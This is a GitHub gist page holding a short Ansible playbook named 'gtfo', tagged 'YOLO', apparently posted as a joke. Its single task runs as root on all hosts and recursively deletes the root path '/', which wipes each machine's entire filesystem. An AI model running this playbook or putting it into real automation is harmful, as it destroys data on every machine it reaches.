Created
February 20, 2014 18:52
-
-
Save rothgar/9120606 to your computer and use it in GitHub Desktop.
ansible-gtfo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- | |
- hosts: all | |
user: root | |
tasks: | |
- name: gtfo | |
file: path=/ state=absent recurse=yes | |
tags: | |
- YOLO |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Oh my!